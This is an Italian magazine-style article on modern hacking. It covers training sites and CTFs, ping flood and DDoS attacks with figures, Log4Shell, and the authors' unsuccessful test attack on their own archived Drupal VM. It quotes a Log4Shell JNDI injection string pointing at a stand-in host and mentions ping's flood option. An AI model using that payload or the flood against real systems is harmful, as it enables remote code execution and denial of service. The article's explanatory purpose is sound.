Risorse e statistiche dell’hacking moderno

Nel mondo degli hacker ci sono stati grandi cambiamenti e la cultura di imparare a intervenire nei computer in modo innovativo per il piacere di farlo si è un po’ persa. Per esempio, se cercate su Google risorse su come hackerare non troverete probabilmente informazioni utili, ma ogni sorta di spam e link di phishing che non vi consigliamo di toccare, neanche con JavaScript disattivato. Tuttavia ci sono molte risorse valide per imparare a fare ricognizioni di rete, test di penetrazione e persino per utilizzare le tecniche di phishing. Siti come https://tryhackme.com, per esempio, vi insegneranno queste abilità con l’obiettivo di insegnarvi a difendervi da esse. TryHackMe rende divertente il processo di apprendimento attraverso la gamification delle esercitazioni, in alcuni casi regalandovi delle macchine virtuali da scaricare e penetrare. Ci sono lezioni, laboratori e concorsi che vi aiuteranno a imparare di tutto, da Metasploit a Maltego. Una parte importante della cultura hacker è rappresentata dalle sfide Capture The Flag (CTF). Chiamato in italiano rubabandiera, il CTF è un gioco tradizionale in cui le squadre competono per cercare di catturare le bandiere dalle basi avversarie e riportarle alla propria. Nella versione hacker, invece, si tratta semplicemente di trovare le “bandiere” (a volte solo file vuoti chiamati flag, altre volte oggetti più interessanti) nascoste da chi ha lanciato la sfida.

Un’inondazione di ping

Abbiamo iniziato con il Ping of Death, quindi concludiamo con l’attacco Ping Flood. Invece di un singolo pacchetto malevolo, viene trasmesso un numero enorme di pacchetti di dimensioni legittime. L’idea è quella di sopraffare il computer target inviando più ping di quanti ne possa gestire. Sia il Ping of Death sia il Ping Flood fanno parte dell’ampia categoria degli attacchi Denial of Service (DoS). Su Linux alcune funzioni del comando ping sono disponibili solo per l’utente root. Un esempio è l’opzione -f o flood, che se usata da sola invia le richieste di eco il più velocemente possibile. Se l’aggressore dispone di una larghezza di banda significativamente maggiore e il difensore non ha un firewall che previene gli attacchi DoS, è possibile che un computer ne paralizzi un altro in questo modo. È più comune, tuttavia, che un hacker utilizzi diversi host per inviare i ping, sferrando un attacco DDoS (Distributed Denial of Service o Denial of Service distribuito). L’attacco è in genere effettuato da una botnet sotto il controllo dell’hacker. I gruppi di criminalità informatica possono affittare sezioni di un gruppo di macchine zombie che hanno creato o usarlo direttamente e la banda a disposizione è enorme. Nel 2016 il provider DNS Dyn è stato mandato offline (rendendo inaccessibili molti siti Web popolari) a causa del malware Mirai, che infetta principalmente i dispositivi IoT utilizzando credenziali predefinite. La larghezza di banda totale di questo attacco è stata stimata intorno a 1,2 Tbps. Nel novembre 2021, Microsoft ha rivelato di aver sventato il più grande attacco DDoS della storia, a ben 3,47 Tbps. Si tratta di una quantità di dati 3.000 volte superiore a quella di una LAN gigabit. La vulnerabilità di Log4shell sfruttava l’input non sanificato e poteva arrivare a consentire l’esecuzione di codice remoto. Tutto ciò che un utente malintenzionato doveva ottenere era far sì che un messaggio accuratamente creato, come:

${jndi:ldap://example.com/bad_file}

fosse scritto in un file di log. Come Bash, Log4j esegue la sostituzione delle stringhe sulle espressioni tra parentesi graffe. Nelle giuste circostanze, il contenuto di /bad_file potrebbe essere eseguito immediatamente sul server. Oppure il log può essere elaborato su un altro server e /bad_file può essere eseguito lì in un secondo momento. Se l’esecuzione del codice viene evitata, un aggressore può comunque far sì che la macchina vulnerabile invii dati (come variabili d’ambiente o contenuti di moduli) alla sua.

Un falso senso di sicurezza

In questo caso si abusa della capacità di Java Naming and Directory Interface (JNDI) di recuperare risorse tramite LDAP, ma è possibile utilizzare altri protocolli. Di conseguenza, poco dopo la prima falla ne sono state scoperte altre, e sono state inizialmente diffuse numerose mitigazioni incomplete, che hanno creato un falso senso di sicurezza. Una volta compromesse, le macchine venivano inserite in botnet, paralizzate da ransomware oppure sfruttate per il mining di criptovalute. È interessante che l’attacco Dyn sia stato attribuito (anche se non in modo definitivo) a giocatori scontenti di Minecraft, come anche Log4j. Infatti, per sfruttare Log4j su un server Minecraft vulnerabile, tutto ciò che si doveva fare era postare nella chat lo snippet di codice che abbiamo riportato. Da lì veniva processato da Log4j e, se si verificavano varie condizioni, l’attaccante poteva eseguire del codice. Con questo si conclude il nostro speciale sugli hacker. Naturalmente abbiamo appena scalfito la superficie dell’argomento e abbiamo visto solo una parte della fantastica selezione di strumenti di Parrot, ma speriamo che abbiate imparato qualcosa. Noi sicuramente sì! Come ultimo esperimento abbiamo preso in considerazione un vecchissimo nostro sito in Drupal. Poiché siamo appassionati di storia digitale, abbiamo archiviato la maggior parte di esso in una macchina virtuale e, dato che oggi parliamo di toolkit per hacker, abbiamo pensato di provare a violarla. Nmap ha rivelato che stava eseguendo il seguente antico software: ProFTPD 1.3.1, Apache 2.2.31, OpenSSH 4.7p1 e Subversion (nessun numero di versione rilevato). Per quanto ci abbiamo provato, però, nessuno dei nostri exploit ha funzionato. Abbiamo usato ZAP (Zed Attack Proxy) di OWASP (Open Web Application Security Project, https://owasp.org) per cercare di attaccare i vecchi moduli di archivio, ma senza successo. ZAP funziona impostando un proxy person in the middle in grado di manipolare le richieste perché vengano inviate al server Web in esame e di ispezionare le risposte. Abbiamo anche provato Metasploit, che meriterebbe un intero articolo a sé stante. Tuttavia il fantasma della nostra macchina, a quanto pare, è inviolabile. A  dimostrazione che, nel mondo degli hacker, bisogna sempre aspettarsi l’impossibile.